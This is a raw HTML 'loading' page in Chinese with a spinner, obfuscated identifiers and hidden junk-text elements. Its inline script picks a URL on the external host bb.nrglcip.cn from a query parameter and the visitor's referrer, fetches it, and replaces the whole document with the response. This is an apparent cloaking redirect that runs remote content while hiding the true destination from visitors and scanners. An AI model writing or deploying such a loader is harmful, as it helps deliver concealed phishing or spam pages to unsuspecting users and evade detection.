<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jErYTC1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jErYTC1 .idhkDKGFx3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jErYTC1 .content {
            line-height: 50px;
            text-align: center
        }

        .jErYTC1 .img {
            width: 100%
        }

        .jErYTC1 .lLVLs0I {
            text-align: center
        }

        .jErYTC1 .lLVLs0I span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jErYTC1 .lLVLs0I span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jErYTC1 .lLVLs0I span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jErYTC1 .lLVLs0I span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jErYTC1 .lLVLs0I span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jErYTC1 .lLVLs0I span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jErYTC1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Sg6yQcIgFPj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iip5A = Sg6yQcIgFPj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iip5A +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iip5A +".html?a=share";
		}
		
        jdYUZ5OYWg=url+"#"+new Date().getTime();
        jdYUZ5OYWg && function() {
            $.get(jdYUZ5OYWg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >SG2BIA4Ah2Ocn2NEScO1QsZmHYuVf8JCTuHThfzBWdLxM9yrVhFFW0</ul>
<li style='display:none' >Lf2C51qKIhIsJtvVgw8hfyybJdxOSADwJolM8Zrzc1O</li>
<p  style='display:none'>lbBOIw1H52KoaOPyJyTNzdLalVSuN8xpsoZL0vyVj1xBP7k1y2xR5xcWw3Vj6hQreD2Owo8Ez5TAa51KbiI0UVL6Kl</p>
<b style='display:none' >EjxVVtf3S7MwgditXgIKmX1tyizoejQprazPV0glv6a3ioF</b>
<span style='display:none'>ZayKUIqYMdgyBp5lP</span>
<p  style='display:none'>lbBOIw1H52KoaOPyJyTNzdLalVSuN8xpsoZL0vyVj1xBP7k1y2xR5xcWw3Vj6hQreD2Owo8Ez5TAa51KbiI0UVL6Kl</p>
<b style='display:none' >EjxVVtf3S7MwgditXgIKmX1tyizoejQprazPV0glv6a3ioF</b>
<b style='display:none' >EjxVVtf3S7MwgditXgIKmX1tyizoejQprazPV0glv6a3ioF</b>
<div style='display:none'>LIQ1iLbkUTnfvh1k7m0TFZd9FVnwFyjhUAkfcfnisFZ7BiCXr6UBHFzuNOMk4kUE2b5uGHB</div>
<img  src='' style='display:none'><div class="jErYTC1">
    <div class="idhkDKGFx3">
        <div class="lLVLs0I">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>RYg14cMdC7J68XAVNDS5dBZGsKXMgu</span>
<span style='display:none'>RYg14cMdC7J68XAVNDS5dBZGsKXMgu</span>
<ul style='display:none' >FqiGFe2WXhgW63UXjxBY8U2EVBS10SBtOw55wn7r14a6PDgVgCw2</ul></body>
</html>